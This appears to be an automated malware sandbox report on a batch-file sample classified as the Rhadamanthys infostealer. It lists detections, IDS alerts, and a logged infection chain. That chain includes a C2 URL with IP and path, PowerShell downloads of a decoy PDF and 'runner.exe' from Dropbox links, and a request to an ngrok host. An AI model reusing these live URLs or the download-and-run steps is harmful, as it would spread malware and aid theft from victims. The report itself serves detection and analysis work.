Source: 00000016.00000002.2387314243.0000000002B45000.00000040.00000001.01000000.00000013.sdmp

Malware Configuration Extractor: Rhadamanthys {"C2 url": "https://104.161.43.18:2845/7e56fc199c7194d0/qc1o4gn8.mjfvk"}

Multi AV Scanner detection for submitted file

Source: 122046760.bat

ReversingLabs: Detection: 13%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Source: unknown	HTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.6.122.107:443 -> 192.168.2.4:49790 version: TLS 1.2

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2341629826.0000013D25540000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n.pdb" source: powershell.exe, 00000002.00000002.2346076101.0000013D25AD3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.2343680999.0000013D25642000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdb source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2401365297.00000000054E0000.00000004.00000001.00020000.00000000.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2401236217.0000000002FE0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.2408564837.0000000005410000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.2409081301.0000000005530000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000002.00000002.2346311590.0000013D25ADC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000002.00000002.2346423503.0000013D25B05000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2346076101.0000013D25AB7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2401851669.0000000005460000.00000004.00000001.00020000.00000000.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2402695142.0000000005680000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.2409389529.0000000005410000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.2409670656.0000000005630000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: d:\assassin\assassin-playground\dx10_integration\main\output\win32\exe\scimitar_dx10_f.pdb source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000016.00000000.2224116880.000000000177E000.00000002.00000001.01000000.00000013.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000000.2382847972.000000000177E000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: ntdll.pdb source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2399795057.0000000005650000.00000004.00000001.00020000.00000000.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2399301584.0000000005460000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.2406466555.0000000005600000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.2405170891.0000000005410000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2400471565.0000000005460000.00000004.00000001.00020000.00000000.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2400727237.0000000005600000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.2407681225.0000000005410000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdblity.pdb source: powershell.exe, 00000002.00000002.2345149895.0000013D25734000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2399795057.0000000005650000.00000004.00000001.00020000.00000000.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2399301584.0000000005460000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.2406466555.0000000005600000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.2405170891.0000000005410000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2400471565.0000000005460000.00000004.00000001.00020000.00000000.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2400727237.0000000005600000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.2407681225.0000000005410000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: softy.pdbg source: powershell.exe, 00000002.00000002.2343680999.0000013D25642000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: utomation.pdb source: powershell.exe, 00000002.00000002.2346365955.0000013D25AF4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdbUGP source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2401851669.0000000005460000.00000004.00000001.00020000.00000000.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2402695142.0000000005680000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.2409389529.0000000005410000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.2409670656.0000000005630000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbUGP source: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2401365297.00000000054E0000.00000004.00000001.00020000.00000000.sdmp, bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe, 00000017.00000003.2401236217.0000000002FE0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.2408564837.0000000005410000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.2409081301.0000000005530000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbEg source: powershell.exe, 00000002.00000002.2346423503.0000013D25B05000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\System32\fontdrvhost.exe

Code function: 4x nop then dec esp

30_2_000001F9D2EB0511

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 104.161.43.18:2845 -> 192.168.2.4:49828

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://104.161.43.18:2845/7e56fc199c7194d0/qc1o4gn8.mjfvk

Source: global traffic

TCP traffic: 192.168.2.4:49828 -> 104.161.43.18:2845

Source: Joe Sandbox View	IP Address: 13.107.21.237 13.107.21.237
Source: Joe Sandbox View	IP Address: 3.6.122.107 3.6.122.107

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic

Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49732 -> 162.125.69.18:443

Source: global traffic	HTTP traffic detected: GET /scl/fi/w47rcqepfnwm2w25ysbw7/Documents-about-company-information-and-job-descriptions-2.pdf?rlkey=yz6h1qih6tkldgdp6erbolsb5&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cd/0/get/CgZVgLsyz241_BcFKRBGtAj2rvkL_CpADxHeK7b0uJDj7dSlrAFmx88FLzRKgx-9qBHs-SNBjRL12BfnojN6YUgdgRA563bhaHP60UgOw94FlDmmp2h5b8RlGiZL-hItTHoDxQXsMp5Bp8DEaxv5fYkU/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uca0471f41417b6dcd98d8de3ee0.dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
Source: global traffic	HTTP traffic detected: GET /cd/0/get/CgZHOpNzhQw4YgiO7_Q1eiXI-xC_0JESI6SNiNP7CaPd1OJi9tRlu7r8wijxjLZyykc6Q1zEuEVi8G5U8BE_7agz1kxv7JuvJQO8rp8v1I6W6qhugEUNq9qs0rsQkKkEmZ-ThhGY4RjrXNSPySTfU1qW/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc46828b6726c0397712b0c1f4ee.dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /metadata/a53f93d43005d4ee2fadb95063c82fef HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.appConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.58.99
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.58.99
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.58.99
Source: unknown	TCP traffic detected without corresponding DNS query: 217.20.58.99
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18
Source: unknown	TCP traffic detected without corresponding DNS query: 104.161.43.18

Source: global traffic	HTTP traffic detected: GET /scl/fi/w47rcqepfnwm2w25ysbw7/Documents-about-company-information-and-job-descriptions-2.pdf?rlkey=yz6h1qih6tkldgdp6erbolsb5&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cd/0/get/CgZVgLsyz241_BcFKRBGtAj2rvkL_CpADxHeK7b0uJDj7dSlrAFmx88FLzRKgx-9qBHs-SNBjRL12BfnojN6YUgdgRA563bhaHP60UgOw94FlDmmp2h5b8RlGiZL-hItTHoDxQXsMp5Bp8DEaxv5fYkU/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uca0471f41417b6dcd98d8de3ee0.dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
Source: global traffic	HTTP traffic detected: GET /cd/0/get/CgZHOpNzhQw4YgiO7_Q1eiXI-xC_0JESI6SNiNP7CaPd1OJi9tRlu7r8wijxjLZyykc6Q1zEuEVi8G5U8BE_7agz1kxv7JuvJQO8rp8v1I6W6qhugEUNq9qs0rsQkKkEmZ-ThhGY4RjrXNSPySTfU1qW/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc46828b6726c0397712b0c1f4ee.dl.dropboxusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /metadata/a53f93d43005d4ee2fadb95063c82fef HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.appConnection: Keep-Alive

Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://.purple.officeapps.live-int.com https://officeapps-df.live.com https://.officeapps-df.live.com https://officeapps.live.com https://.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; base-uri 'self' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; img-src https:// data: blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; media-src https://* blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; frame-ancestors 'self' https://.dropbox.com ; font-src https://* data: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://.dropboxusercontent.com/p/hls_playlist/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://.purple.officeapps.live-int.com https://officeapps-df.live.com https://.officeapps-df.live.com https://officeapps.live.com https://.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; base-uri 'self' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; img-src https:// data: blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; media-src https://* blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; frame-ancestors 'self' https://.dropbox.com ; font-src https://* data: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://.dropboxusercontent.com/p/hls_playlist/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D443000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: img-src https://* data: blob: ; media-src https://* blob: ; font-src https://* data: ; base-uri 'self' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; frame-ancestors 'self' https://.dropbox.com ; style-src https:// 'unsafe-inline' 'unsafe-eval' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://.purple.officeapps.live-int.com https://officeapps-df.live.com https://.officeapps-df.live.com https://officeapps.live.com https://.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://.dropboxusercontent.com/p/hls_playlist/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: media-src https://* blob: ; font-src https://* data: ; base-uri 'self' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; frame-ancestors 'self' https://.dropbox.com ; style-src https:// 'unsafe-inline' 'unsafe-eval' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://.purple.officeapps.live-int.com https://officeapps-df.live.com https://.officeapps-df.live.com https://officeapps.live.com https://.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://.dropboxusercontent.com/p/hls_playlist/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000002.00000002.2268647629.0000013D0D3CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: rame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; frame-ancestors 'self' https://.dropbox.com ; style-src https:// 'unsafe-inline' 'unsafe-eval' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://.purple.officeapps.live-int.com https://officeapps-df.live.com https://.officeapps-df.live.com https://officeapps.live.com https://.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ 